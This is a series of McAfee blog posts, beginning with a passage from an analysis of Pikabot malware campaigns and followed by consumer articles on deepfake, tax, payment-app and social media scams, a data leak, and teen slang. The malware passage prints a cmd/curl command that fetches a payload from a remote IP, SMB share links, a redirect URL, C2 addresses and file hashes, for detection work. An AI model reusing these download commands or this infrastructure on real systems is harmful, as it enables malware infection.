The below HTML code is a snippet from the malware where it is a properly aligned HTML that has a body meta redirection to a remote text file hosted at the specified URL. There are distractions in the HTML which are not rendered by the browser.
Figure 2.HTML Code
The above highlighted meta tag triggers an immediate refresh of the page and redirects the browser to the specified URL: ‘file://204.44.125.68/mcqef/yPXpC.txt’. This appears to be a file URL, pointing to a text file on a remote server.
Here are some reasons why an attacker might choose a meta tag refresh over traditional redirects:
Stealth and Evasion: Meta tag refreshes can be less conspicuous than HTTP redirects. Some security tools and detection mechanisms may be more focused on identifying and blocking known redirect patterns.
Client-Side Execution: Meta tag refreshes occur on the client side (in the user’s browser), whereas HTTP redirects are typically handled by the server. This may allow attackers to execute certain actions directly on the user’s machine, making detection and analysis more challenging.
Dynamic Behavior: Meta tag refreshes can be dynamically generated and inserted into web pages, allowing attackers to change the redirection targets more easily and frequently. This dynamic behavior can make it harder for security systems to keep up with the evolving threat landscape.
In this campaign, McAfee blocks the HTML file.
Figure 3.HTML file
Distributed through a compressed zip file, the package includes a .js file that subsequently initiates the execution of curl.exe to retrieve the payload.
Infection Chain:
.zip->.js->curl->.exe
Code snippet of .js file:
Figure 4. Javascript Code
When the JavaScript is executed, it triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to download the payload.
Since the URL “hxxp://103.124.105.147/KNaDVX/.dat” is inactive, the payload is not downloaded to the below location.
Commandline:
‘”C:\Windows\System32\cmd.exe” /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat –output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe’
McAfee blocks both the javascript and the exe file thus rendering McAfee customers safe from this campaign.
Figure 5. JS file
Figure 6. EXE file
In this campaign, Malware leverages the MonikerLink bug by distributing malware through email conversations with older thread discussions, wherein recipients receive a link to download the payload from an SMB share. The link is directly present in that Outlook mail.
Infection Chain:
EML ->SMB share link->.zip->.exe
Spam Email:
Figure 7. Spam email with SMB share link
SMB Share link: file://newssocialwork.com/public/FNFY.zip
In this campaign, McAfee successfully blocks the executable file downloaded from the SMB share.
Figure 8. EXE file
Figure 9. Face in Excel
Infection Chain:
.zip >.xls > .js > .dll
This week, threat actors introduced a novel method to distribute their Pikabot malware. Targeted users received an Excel spreadsheet that prompted them to click on an embedded button to access “files from the cloud.”
Upon hovering over the “Open” button, we can notice an SMB file share link -file:///\\85.195.115.20\share\reports_02.15.2024_1.js.
Bundled files in Excel:
Figure 10. Bundled files inside Excel
The Excel file doesn’t incorporate any macros but includes a hyperlink directing to an SMB share for downloading the JavaScript file.
The hyperlink is present in the below relationship file.
Figure 11. XML relationship file
Content of relationship file:
Figure 12. xl/drawings/_rels/drawing1.xml.rels
Code of JS file:
Figure 13. Obfuscated javascript code
The JS file contains mostly junk codes and a small piece of malicious code which downloads the payload DLL file saved as “nh.jpg”.
Figure 14. Calling regsvr32.exe
The downloaded DLL payload is executed by regsvr32.exe.
In this campaign, McAfee blocks the XLSX file.
Figure 15. XLSX file
In this campaign, distribution was through a compressed zip file, the package includes a .jar file which on execution drops the DLL file as payload.
Infection Chain:
.zip>.jar>.dll
On extraction, the below files are found inside the jar file.
Figure 16. Extraction of JAR file
The MANIFEST file indicates that hBHGHjbH.class serves as the Main-Class in the provided files.
The jar file on execution loads the file “163520” as a resource and drops it as .png to the %temp% location which is the payload DLL file.
Figure 17. Payload with .png extension
Following this, java.exe initiates the execution of regsvr32.exe to run the payload.
In this campaign, McAfee blocks both the JAR and DLL files.
Figure 18. JAR file
Figure 19. DLL file
Due to a relatively high entropy of the resource section, the sample appears packed.
Figure 20. Loader Entropy
Initially, Malware allocates memory using VirtualAlloc (), and subsequently, it employs a custom decryption loop to decrypt the data, resulting in a PE file.
Figure 21. Decryption Loop
Figure 22. Decrypted to get the PE file
Once the data is decrypted, it proceeds to jump to the entry point of the new PE file. When this PE file gets executed, it injects the malicious content in ctfmon.exe with the command line argument “C:\Windows\SysWOW64\ctfmon.exe -p 1234”
Figure 23. Injection with ctfmon.exe
To prevent double infection, it employs a hardcoded mutex value {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} by calling CreateMutexW(), followed by a call to GetLastError() to check the last error code.
Figure 24. Mutex
Malware collects the data from the victim machine and sends it to the C2 server.
Figure 25. Network activity
PIKABOT performs network communication over HTTPS on non-traditional ports (2221, 2078, etc).
Figure 26. Network activity
Figure 27. C2 communication
C2 found in the payload are:
178.18.246.136:2078
86.38.225.106:2221
57.128.165.176:1372
| File Type | SHA 256 |
| ZIP | 800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a |
| HTML | 9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82 |
| ZIP | 4c29552b5fcd20e5ed8ec72dd345f2ea573e65412b65c99d897761d97c35ebfd |
| JS | 9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849 |
| EXE | 89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9 |
| ZIP | f3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512 |
| EXE | aab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1 |
| XLSX | bcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5 |
| JS | 49d8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72 |
| ZIP | d4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04 |
| JAR | d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4 |
| DLL | 7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e |
The post Distinctive Campaign Evolution of Pikabot Malware appeared first on McAfee Blog.
With the rise of cheap and easy-to-use AI tools, deepfake attacks find themselves likewise on the rise. Startling as that news might sound, you have several ways of falling victim to one.
Right now, we’re seeing plenty of AI voice cloning tools used in deepfake attacks. These attacks work much like classic targeted phishing attacks, also known as “spearphishing,” given the precision scammers use to pull them off.
It works like this:
A scammer identifies a target, gathers info on them, and then uses that info against them in a deepfake attack. With info gathered from their social media profiles, public records, “people finder” sites, and data broker sites, scammers create convincing-sounding messages with AI voice-cloning tools.
All they need is a script and a sample of a person’s voice that they want to impersonate — pulled from, say, YouTube, a social media video, a conference call, what have you. Just a few minutes does the trick, creating a voice clone that requires an expert to detect.
Between an uncanny voice clone and a script peppered with all kinds of personal details, these deepfake messages sound legit.
Moreover, scammers use another tool to get their victims to act. Urgency. They play on people’s emotions so that they’ll take the bait in the head of the moment. Imagine a deepfake message that sounds like it’s from a friend or family member. Their car broke down in the middle of nowhere and they need money for a repair or they run into trouble while traveling abroad and likewise need money to get out of a jam. In all, the voice clone says it needs help and needs it now.
Before the victim knows it, they’ve readily handed over funds, personal info, or both to a scammer — which leads to things like identity theft and fraud.
As these attacks started cropping up last year, we surveyed people worldwide to get a sense of just how often they occur. Out of 7,000 people surveyed, one in four said that they had experienced an AI voice cloning scam or knew someone who had.
Moreover, those attacks came at a cost. Of the people who reported losing money to an audio deepfake, 36% said they lost between $500 and $3,000, while 7% got taken for sums anywhere between $5,000 and $15,000.
Again, as even as convincing as these deepfake messages might sound, you can keep yourself safer from these attacks. It starts with keeping your personal info out of the hands of scammers.
Make your social media more private. Our new McAfee Social Privacy Manager personalizes your privacy based on your preferences. It does the heavy lifting by adjusting more than 100 privacy settings across your social media accounts in only a few clicks. This makes sure that your personal info is only visible to the people you want to share it with. It also keeps it out of search engines where the public, and scammers, can see it.
Remove your info from data brokers that sell it. McAfee Personal Data Cleanup helps you remove your personal info from many of the riskiest data broker sites out there. Running it regularly can keep your name and info off these sites, even as data brokers collect and post new info. Depending on your plan, it can send requests to remove your data automatically.
Delete your old accounts. Yet another source of personal info comes from data breaches. Scammers use this info as well to complete a sharper picture of their potential victims. With that, many internet users can have over 350 online accounts, many of which they might not know are still active. McAfee Online Account Cleanup can help you delete them. It runs monthly scans to find your online accounts and shows you their risk level. From there, you can decide which to delete, protecting your personal info from data breaches and your overall privacy as a result.
Set a verbal password with your friends and family. Several deepfake attacks involve an urgent voice message from a friend or family member. Setting a verbal password like you do with banks and alarm companies can help determine if a message is real or fake. Make sure everyone knows and uses it in messages when they ask for help.
Typically, deepfake attacks lead to some kind of fraud. Victims hand over money, personal info, credit card numbers, and gift cards after being taken in by the fraudster. So while deepfakes are new, the attack itself plays out like an age-old con game. With the age-old results. Given that, recovering from a deepfake attack follows the same steps it takes to recover from practically any type of fraud.
File a police report.
Someone stole from you. Treat fraud like the crime it is. Start by contacting law enforcement to file a report. Your local police department can issue a formal report, which you might need to get your bank or other financial institution to reverse fraudulent charges.
Before contacting the police, gather all the relevant info about what happened. This could include the dates and times of fraudulent activity and any account numbers affected. Bringing copies of your bank statements can be useful. Also, make note of any suspicious activity that might be related. For example, was your debit card recently lost or your email hacked? The police will want to know.
Notify the companies involved.
Depending on how you responded to the deepfake, the companies involved might include banks, credit card companies, the providers of gift cards, and other money transfer services. Each will have a method of reporting fraud. Some might offer ways to reverse the charges or recoup the funds. But not always. Scammers ask for payment in gift cards and money transfers for a reason. They’re as good as cash. After that money is gone, it’s likely gone for good.
In the U.S., File a report with the Federal Trade Commission.
In the U.S., the Federal Trade Commission (FTC) hosts IdentityTheft.gov where you can further report such crimes. Along with the details you provide, it can create a free recovery plan you can use to address the effects of identity theft, like contacting the major credit bureaus or alerting the Internal Revenue Service (IRS) fraud department. You can report your case online or by calling 1-877-438-4338.
For another excellent resource from the FTC, you can visit their page dedicated to scam recovery. It offers detailed guidance for several types of scams and what to do if you fall victim to one.
And outside of the U.S.
Our knowledge base article on identity theft offers suggestions for the specific steps you can take in specific countries, along with helpful links for local authorities that you can turn to for reporting and assistance.
Put a freeze on your credit to prevent further theft.
A credit freeze is another smart move, which you can do through each of the three major credit bureaus. You can either call them or start the process online. This prevents people from accessing your credit report. Lenders, creditors, retailers, landlords, and others might want to see your credit as proof of financial stability. For example, if someone tries to open a phone contract under your name, the retailer might check the credit report. If there is a credit freeze in place, they won’t be able to view it and won’t issue the contract. If you need to allow someone access to your credit report, you can temporarily lift the freeze. And depending on your plan, you can issue a credit freeze or an even more comprehensive security freeze right from the McAfee app.
Use identity theft coverage to recover from deepfake fraud.
Having coverage in place before an attack can save you time and money should the unexpected happen. Our Identity Theft & Restoration Coverage can help. It offers $2 million in coverage and assistance from a licensed identity restoration pro who can repair your identity and your credit after an attack.
The post Are You a Victim of a Deepfake Attack? Here’s What to Do Next appeared first on McAfee Blog.
As taxpayers prepare their returns for April 15th, scammers prepare too. They see tax season as high time to run all kinds of scams and identity theft schemes.
Fake accountants, fake tax software, robocalls, and more all make the list. We’ll give you a look at what’s happening out there right now. And we’ll run down several ways you can keep safe.
A commonly used tactic involves hackers posing as collectors from the IRS, as tax preparers, or government bureaus. This tactic is pretty effective due to Americans’ concerns about misfiling their taxes or accidentally running into trouble with the IRS. Scammers take advantage of this fear, manipulating innocent users into providing sensitive information or money over the phone or by email. And in extreme cases, hackers may be able to infect computers with malware via malicious links or attachments sent through IRS email scams.
Another tactic used to take advantage of taxpayers is the canceled social security number scam. Hackers use robocalls claiming that law enforcement will suspend or cancel the victim’s Social Security number in response to taxes owed. Often, victims are scared into calling the fraudulent numbers back and persuaded into transferring assets to accounts that the scammer controls. Users need to remember that the IRS will only contact taxpayers through snail mail or in person, not over the phone.
Another scam criminals use involves emails impersonating the IRS. Victims receive a phishing email claiming to be from the IRS, reminding them to file their taxes or offering them information about their tax refund via malicious links. If a victim clicks on the link, they will be redirected to a spoofed site that collects the victim’s personal data, facilitating identity theft. What’s more, a victim’s computer can become infected with malware if they click on a link with malicious code, allowing fraudsters to steal more data.
Scammers also take advantage of the fact that many users seek out the help of a tax preparer or CPA during this time. These criminals will often pose as professionals, accepting money to complete a user’s taxes but won’t sign the return. This makes it look like the user completed the return themselves. However, these ghost tax preparers often lie on the return to make the user qualify for credits they haven’t earned or apply changes that will get them in trouble. Since the scammers don’t sign, the victim will then be responsible for any errors. This could lead to the user having to repay money owed, or potentially lead to an audit.
While these types of scams can occur at any time of the year, they are especially prevalent leading up to the April tax filing due date. Consumers need to be on their toes during tax season to protect their personal information and keep their finances secure. To avoid being spoofed by scammers and identity thieves, follow these tips:
File before cybercriminals do it for you. The easiest defense you can take against tax seasons schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.
Keep an eye on your credit and your identity. Keeping tabs on your credit report and knowing if your personal information has been compromised in some way can help prevent tax fraud. Together, they can let you know if someone has stolen your identity or if you have personal info on the dark web that could lead to identity theft.
Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double check their legitimacy with a manager or the security department before you respond. Remember: the IRS will not initiate contact with taxpayers by email, text messages, or social media channels to request personal or financial info. So someone contacts you that way, ignore the message.
Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
Protect yourself from scam messages. Scammers also send links to scam sites via texts, social media messages, and email. McAfee Scam Protection can help you spot if the message you got is a fake. It uses AI technology that automatically detects links to scam URLs. If you accidentally click, don’t worry, it can block risky sites if you do.
Clean up your personal info online. Crooks and scammers have to find you before they can contact you. After all, they need to get your phone number or email from somewhere. Sometimes, that’s from “people finder” and online data brokers that gather and sell personal info to any buyer. Including crooks. McAfee Personal Data Cleanup can remove your personal info from the data broker sites scammers use to contact their victims.
Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.
The post Watch Out For IRS Scams and Avoid Identity Theft appeared first on McAfee Blog.
AT&T, one of the largest telecom giants, recently acknowledged a significant data leak that has affected millions of its customers. The leaked dataset, which includes personal information such as names, addresses, phone numbers, and Social Security numbers, has raised concerns about privacy and security. In this blog post, we will provide an overview of the situation, explain the steps AT&T is taking to address the issue, and offer guidance on how you can protect yourself.
The Data Leak: AT&T has confirmed that the leaked dataset contains information from over 7.6 million current customers and 65 million former customers. The compromised data may include full names, email addresses, mailing addresses, phone numbers, Social Security numbers, dates of birth, AT&T account numbers, and passcodes. The company has reset the security passcodes of affected active customers.
AT&T’s Response: AT&T is actively reaching out to affected customers via email or letter to inform them about the data that was included in the leak and the measures being taken to address the situation. The company has also initiated a thorough investigation, working with external cybersecurity experts to analyze the incident. So far, there is no evidence of authorized access to AT&T’s systems resulting in data exfiltration.
Protecting Yourself: If you are an AT&T customer, it is crucial to take steps to protect yourself from potential fraud or identity theft. AT&T recommends setting up free fraud alerts with credit bureaus Equifax, Experian, and TransUnion. These alerts can help notify you of any suspicious activity related to your personal information. Additionally, consider implementing the following measures:
McAfee+ automatically monitors your personal data, including your:
✓ Social Security Number / Government ID
✓ Driver’s license number
✓ Passport number
✓ Tax ID
✓ Date of birth
✓ Credit card numbers
✓ Bank account numbers
✓ Usernames
✓ Insurance ID cards
✓ Email addresses
✓ Phone numbers
AT&T’s data leak is a concerning incident that highlights the importance of safeguarding personal information in the digital age. By staying informed, taking proactive measures to protect yourself, and remaining vigilant against potential threats, you can minimize the risk of falling victim to fraud or identity theft. Remember, your privacy and security are paramount, and it’s crucial to stay one step ahead of cybercriminals.
The post AT&T Data Leak: What You Need to Know and How to Protect Yourself appeared first on McAfee Blog.
People under 60 are losing it online. And by it, I mean money—thanks to digital identity theft.
In its simplest form, your digital identity is made up of a whole host of things that can be traced back to you and who you are. That can range anywhere from photos you post online to online shopping accounts, email accounts to telephone numbers, and bank accounts to your tax ID.
In this way, your digital identity is like dozens upon dozens of puzzle pieces made up of different accounts, ID numbers, and so forth. When put together, they create a picture of you. And that’s why those little puzzle pieces of your identity are such attractive targets for hackers. If they get the right combination of them, you can end up a victim of theft or fraud.
Here’s what’s happening: people under 60 were twice as likely to report losing money while shopping online. The spotlight also shows that adults under 60 are more than four times more likely to report losing money to an investment scam, and the majority of those losses happened in scams involving some form of cryptocurrency investments.
And it’s no surprise younger adults get targeted this way. They’re far more likely than any other age group to use mobile apps for peer-to-peer payments, transfer money between accounts, deposit checks, and pay bills. In short, there’s a lot of money flowing through the palms of their hands thanks to their phones, as well as their computers.
Protecting yourself from hackers and fraud means protecting your digital identity. And that can feel like a pretty huge task given all the information your digital identity includes. It can be done, though, especially if you think about your identity like a puzzle. A piece here, another piece there, can complete the picture (or complete it just enough) to give a hacker what they need to separate you from your money. Thus, the way to stay safe is to keep those puzzle pieces out of other people’s hands.
It’s actually not that tough. With a few new habits and a couple of apps to help you out, you can protect yourself from the headaches and flat-out pain of fraud. Here’s a list of straightforward things that you can get started on right away:
1. Start with the basics—security software
Protect yourself by protecting your stuff. Installing and using security software on your computers and phones can prevent all kinds of attacks and make you safer while you surf, bank, and shop online. I should emphasize it again—protect your phone. Only about half of people protect their phones even though they use them to hail rides, order food, send money to friends, and more. Going unprotected on your phone means you’re sending all that money on the internet in a way that’s far, far less safe than if you use online protection.
2. Create strong passwords
You hear this one all the time and for good reason—strong, unique passwords offer one of your best defenses against hackers. Never re-use them (or slight alterations of them) across the different platforms and services you use. Don’t forget to update them on the regular (that means at least every 60 days)! While that sounds like a lot of work, a password manager can keep on top of it all for you. And if your platform or service offers the use of two-factor authentication, definitely make use of that. It’s a further layer of security that makes hacking tougher for crooks.
3. Keep up to date with your updates
Updates have a way of popping up on our phones and computers nearly every day, resist the urge to put them off until later. Aside from making improvements, updates often include important security fixes. So, when you get an alert for your operating system or app on your devices, go ahead and update. Think of it as adding another line of defense from hackers who are looking to exploit old flaws in your apps.
4. Think twice when you share
Social media is one place hackers go to harvest personal information because people sometimes have a way of sharing more than they should. With info like your birthday, the name of your first school, your mother’s maiden name, or even the make of your first car, they can answer common security questions that could hack into your accounts. Crank up the privacy settings on your accounts so only friends and family can see your posts—and realize the best defense here is not to post any possibly sensitive info in the first place. Also, steer clear of those “quizzes” that sometimes pop up in your social feeds. Those are other ways that hackers try to gain bits of info that can put your identity at risk.
5. Shred it
Even though so many of us have gone paperless with our bills, identity theft by digging through the trash, or “dumpster diving,” is still a thing. Things like medical bills, tax documents, and checks still might make their way to your mailbox. You’ll want to dispose of them properly when you’re through with them. First, invest in a paper shredder. Once you’ve online deposited that check or paid that odd bill, shred it so that any personal or account info on there can’t be read (and can be recycled securely). Second, if you’re heading out of town for a bit, have a friend collect your mail or have the post office put a temporary hold on your mail. That’ll prevent thieves from lifting personal info right from your mailbox while you’re away.
6. Check your credit
Even if you don’t think there’s a problem, go ahead and check your credit. The thing is, someone could be charging things against your name without you even knowing it. Depending on where you live, different credit reporting agencies keep tabs on people’s credit. In the U.S., the big ones are Equifax, Experian, and TransUnion. Also in the U.S., the Fair Credit Reporting Act (FCRA) requires these agencies to provide you with a free credit check at least once every 12 months. Canada, the UK, and other nations likewise offer ways to get a free credit report. Run down your options—you may be surprised by what you find.
As I just mentioned, the quickest way to get sense of what’s happening with your identity is to check your credit. Identity theft goes beyond money. Crooks will steal identities to rent apartments, access medical services, and even get jobs. Things like that can show up on a credit report, such as when an unknown address shows up in a list of your current and former residences or when a company you’ve never worked for shows up as an employer. If you spot anything strange, track it down right away. Many businesses have fraud departments with procedures in place that can help you clear your name if you find a charge or service wrongfully billed under your name.
Other signs are far more obvious. You may find collection agencies calling or even see tax notices appearing in your mailbox (yikes). Clearly, cases like those are telltale signs that something is really wrong. In that case, report it right away:
Likewise, many nations offer similar government services. A quick search will point you in the right direction.
Another step you can take is to ask each credit bureau to freeze your credit, which prevents crooks from using your personal information to open new lines of credit or accounts in your name. Fraud alerts offer another line of protection for you as well, and you can learn more about fraud alerts here.
With so many bits and pieces of information making up your digital identity, a broader way of keeping it safe involves asking yourself a question: what could happen if someone got their hands on this info? Further realizing that even little snippets of unsecured info can lead to fraud or theft in your name helps—even that un-shredded bill or innocuous refund check for a couple of bucks could give a crook the puzzle piece they need. You can keep your digital identity safe by keeping those pieces of info out of other people’s hands.
The post How to Protect Your Digital Identity appeared first on McAfee Blog.
Got any ‘rizz’? Did you ‘slay’ that dinner? Is the ‘cozzie livs’ stressing you out?
If you do not comprehendo, then you wouldn’t be alone. As a mum of 4, I can attest that understanding teenage slang can be quite the feat – as soon as you finally understand a few terms, there’s more! And while you don’t want to seem too intrusive (or uncool) and constantly ask your kids to translate, you probably want to keep a handle on what’s going on – in case you need to get involved!!
Where Does Slang Come From and Why Do We Use It?
Nothing ever stays the same and that includes language. Slang happens when we shorten words. Think fab instead of fabulous; or when we combine words think chill and relax = chillax. It can also ‘evolve’ when we give words new, unexpected meanings eg cheugy – a term to often describe older generations when they make an effort but fail – harsh!!
And more often than not, words that end up becoming slang will become part of our everyday language. Did you know that the word ‘mad’ was in fact a slang word for angry that became popular around 100 years ago?
Emily Brewster, senior editor at Merriam Webster Dictionary believes that ‘slang can be used to have a special form of communication with a subset of people.’ And ‘by using words that are only understood by the small group of people there’s an intimacy that can develop.’ So, really it’s a type of bonding tool!!
What Slang Do You Need To Know Now
While slang can sometimes be geographic based, the rise of platforms like TikTok have meant that its far more universal than it was in pre-social media days. So, if you’re keen to know the top words your kids are using so you ensure all is well, then here’s your go-to guide with the top 20 slang words. Apologies in advance for the potentially lewd references!!
1. Addy – address
‘Can you send me your addy? I’ll be there soon.’
2. Based – when you agree with something; or when you want to recognize someone for being themselves
‘You’re going to that party? Based.’
3. Ate that – to successfully achieve something
‘I love that dress. You totally ate that look’ (the dress looked great on you)
4. Basic – average
A word to describe someone who is predictable or bland. It’s an insult.
5. Cappin – lying
‘He’s so cappin’ (he is so not telling the truth)
6. Cheugy – basic, out of date or trying too hard
‘My older brother still wears his uggs, that’s so cheugy!’
7. Cozzie Livs – the cost of living crises
An Australian slang expression that was nominated as Macquarie Dictionary’s word of the year in 2023.
‘I can’t go out tonight. Especially with the cozzie livs and all that jazz.’
8. Ded – so funny or embarrassing!
‘OMG. That pic has me ded’
9. Delulu – a short-hand term for delusional. It’s often used to describe someone in a humorous way who chooses to reject reality in favour of a more interesting interpretation of events.
‘She’s so delulu. She thinks she’s going to marry the lead actor in her favourite movie.’
10. Gas Up – to encourage or hype someone up.
‘My sister was feeling down so I gassed her up and reminded her just how great she is.’
11. Low key – The opposite of high key, it can mean slightly, occasionally, or even secretly.
‘I low key want a Poke bowl right now!’
12. High key – the opposite of ‘low key’. The term is used to when you really like something like something or want to emphasise it.
‘I high key love that brand’ (you’re a fan!)
13. IFKKYK – if you know you know.
It means if you weren’t there, you wouldn’t know. It could also refer to an inside joke.
‘Last night’s concert was amazing! IFKKYK’
14. No Cap – a term to emphasise that you’re not lying. A modern way of saying ‘I swear’
‘I saw him take the last biscuit. No cap’
15. Pop Off – when someone is doing well – often used in gaming.
‘Look at Ninja (streamer). He’s popping off on Fortnight’
16. Rizz – charisma. It can also describe one’s ability to attract a partner.
‘She’s got rizz!’
17. Roman Empire – something you love and think about all the time.
‘Visiting Paris is my Roman Empire’ or ‘America Ferrera’s Barbie monologue is my Roman Empire.’
18. Salty – annoyed or upset.
‘I don’t know why he is so salty’.
19. Simp – someone who tries too hard or goes above and beyond to impress the person they like.
‘He got her a ring after four dates. He’s such a simp!’
20. Slay – to do something exceedingly well.
‘He slayed that performance’.
So, next time your teen drops a phrase or acronym they think you can’t decipher, you will have NP (no problem) understanding what’s happening in your kids’ lives and absolutely no FOMO (fear of missing out)!
Good luck!!
Alex x
The post Teen Slang – What You Need To Know To Understand Your Teen appeared first on McAfee Blog.
There used to be a time when one roommate split the cost of rent with another by writing a check. Who still owns a checkbook these days? Of course, those days are nearly long gone, in large part thanks to “peer to peer” (P2P) mobile payment apps, like Venmo, Zelle, or Cash App. Now with a simple click on an app, you can transfer your friend money for brunch before you even leave the table. Yet for all their convenience, P2P mobile payment apps could cost you a couple of bucks or more if you’re not on the lookout for things like fraud. The good news is that there are some straightforward ways to protect yourself.
You likely have one of these apps on your phone already. If so, you’re among the many. It’s estimated that 49% of adults in the U.S. use mobile payment apps like these.
Yet with all those different apps come different policies and protections associated with them. So, if you ever get stuck with a bum charge, it may not always be so easy to get your money back.
With that, here are seven quick tips for using your P2P mobile payment apps safely.
In addition to securing your account with a strong password, go into your settings and set up your app to use a PIN code, facial ID, or fingerprint ID. (And make sure you’re locking your phone the same way too.) This provides an additional layer of protection in the event your phone is stolen or lost and someone, other than you, tries to make a payment with it.
What’s worse than sending money to the wrong person? When paying a friend for the first time, have them make a payment request for you. This way, you can be sure that you’re sending money to the right person. With the freedom to create account names however one likes, a small typo can end up as a donation to a complete stranger. To top it off, that money could be gone for good!
Another option is to make a test payment. Sending a small amount to that new account lets both of you know that the routing is right and that a full payment can be made with confidence.
Bye, bye, bye! Unlike some other payment methods, new mobile payment apps don’t have a way to dispute a charge, cancel a payment, or otherwise use some sort of recall or retrieval feature. If anything, this reinforces the thought above—be sure that you’re absolutely making the payment to the right person.
Credit cards offer a couple of clear advantages over debit cards when using them in association with mobile payment apps (and online shopping for that matter too). Essentially, they can protect you better from fraud:
Report any activity like this immediately to your financial institution. Timing can be of the essence in terms of limiting your liabilities and losses. For additional info, check out this article from the Federal Trade Commission (FTC) that outlines what to do if your debit or credit card is stolen and what your liabilities are.
Also, note the following guidance from the FTC on payment apps:
“New mobile apps and forms of payment may not provide these same protections. That means it might not always be easy to get your money back if something goes wrong. Make sure you understand the protections and assurances your payment services provider offers with their service.”
It’s sad but true. Crooks are setting up all kinds of scams that use mobile payment apps. A popular one involves creating fake charities or posing as legitimate ones and then asking for funds by mobile payment. To avoid getting scammed, check and see if the charity is legit. The FTC suggests researching resources like Better Business Bureau’s Wise Giving Alliance, Charity Navigator, Charity Watch or, GuideStar.
Overall, the FTC further recommends the following to keep yourself from getting scammed:
With so much of your life on your phone, getting security software installed on it can protect you and the things you keep on your phone. Whether you’re an Android owner or iOS owner, mobile security software can keep your data, shopping, and payments secure.
The post Avoid Making Costly Mistakes with Your Mobile Payment Apps appeared first on McAfee Blog.
Before you take the fun-looking quiz that popped up in your social media feed, think twice. The person holding the answers may be a hacker.
Where people go, hackers are sure to follow. So it’s no surprise hackers have set up shop on social media. This has been the case for years, yet now social media-based crime is on the rise. Since 2021, total reported losses to this type of fraud reached $2.7 billion.
Among these losses are cases of identity theft, where criminals use social media to gather personal information and build profiles of potential victims they can target. Just as we discussed in our recent blog, “Can thieves steal identities with only a name and address?” these bits of information are important pieces in the larger jigsaw puzzle that is your overall identity.
Let’s uncover these scams these crooks use so that you can steer clear and stay safe.
“What’s your spooky Halloween name?” or “What’s your professional wrestler name?” You’ve probably seen a few of those and similar quizzes in your feed where you use the street you grew up on, your birthdate, your favorite song, and maybe the name of a beloved first pet to cook up a silly name or some other result. Of course, these are pieces of personal information, sometimes the answer to commonly used security questions by banks and other financial institutions. (Like, what was the model of your first car?) With this info in hand, a hacker could attempt to gain access to your accounts.
Similarly, scammers will also post surveys with the offer of a gift card to a popular retailer. All you have to do is fork over your personal info. Of course, there’s no gift card coming. Meanwhile, that scammer now has some choice pieces of personal info that they can potentially use against you.
How to avoid them: Simply put, don’t take those quizzes and surveys online.
The list here is long. These include posts and direct messages about phony relief funds, grants, and giveaways—along with bogus business opportunities that run the gamut from thinly veiled pyramid schemes and gifting circles to mystery shopper jobs. What they all have in common is that they’re run by scammers who want your information, money, or both. If this sounds familiar, like those old emails about transferring funds for a prince in some faraway nation, it is. Many of these scams simply made the jump from email to social media platforms.
How to avoid them: Research any offer, business opportunity, or organization that reaches out to you. A good trick is to do a search of the organization’s name plus the term “scam” or “review” or “complaint” to see if anything sketchy comes up.
If there’s one government official that scammers like to use to scare you, it’s the tax collector. These scammers will use social media messaging (and other mediums like emails, texts, and phone calls) to pose as an official who’s either demanding back taxes or offering a refund or credit—all of which are bogus and all of which involve you handing over your personal info, money, or both.
How to avoid them: Delete the message. In the U.S., the IRS and other government agencies will never reach out to you in this way or ask you for your personal information. Likewise, they won’t demand payment via wire transfer, gift cards, or cryptocurrency like Bitcoin. Only scammers will.
These are far more targeted than the scams listed above because they’re targeted and often rely upon specific information about you and your family. Thanks to social media, scammers can gain access to that info and use it against you. One example is the “grandkid scam” where a hacker impersonates a grandchild and asks a grandparent for money. Similarly, there are family emergency scams where a bad actor sends a message that a family member was in an accident or arrested and needs money quickly. In all, they rely on a phony story that often involves someone close to you who’s in need or trouble.
How to avoid them: Take a deep breath and confirm the situation. Reach out to the person in question or another friend or family member to see if there really is a concern. Don’t jump to pay right away.
This is one of the most targeted attacks of all—the con artist who strikes up an online relationship to bilk a victim out of money. Found everywhere from social media sites to dating apps to online forums, this scam involves creating a phony profile and a phony story to go with it. From there, the scammer will communicate several times a day, perhaps talking about their exotic job in some exotic location. They’ll build trust along the way and eventually ask the victim to wire money or purchase gift cards.
How to avoid them: Bottom line, if someone you’ve never met in person asks you for money online, it’s a good bet that it’s a scam. Don’t do it.
Now with an idea of what the bad actors are up to out there, here’s a quick rundown of things you can do to protect yourself further from the social media scams they’re trying to pull.
Above and beyond what we’ve covered so far, some online protection basics can keep you safer still. Comprehensive online protection software will help you create strong, unique passwords for all your accounts, help you keep from clicking links to malicious sites, and prevent you from downloading malware. Moreover, it can provide you with identity protection services like ours, which keep your personal info private with around-the-clock monitoring of your email addresses and bank accounts with up to $1M of ID theft insurance.
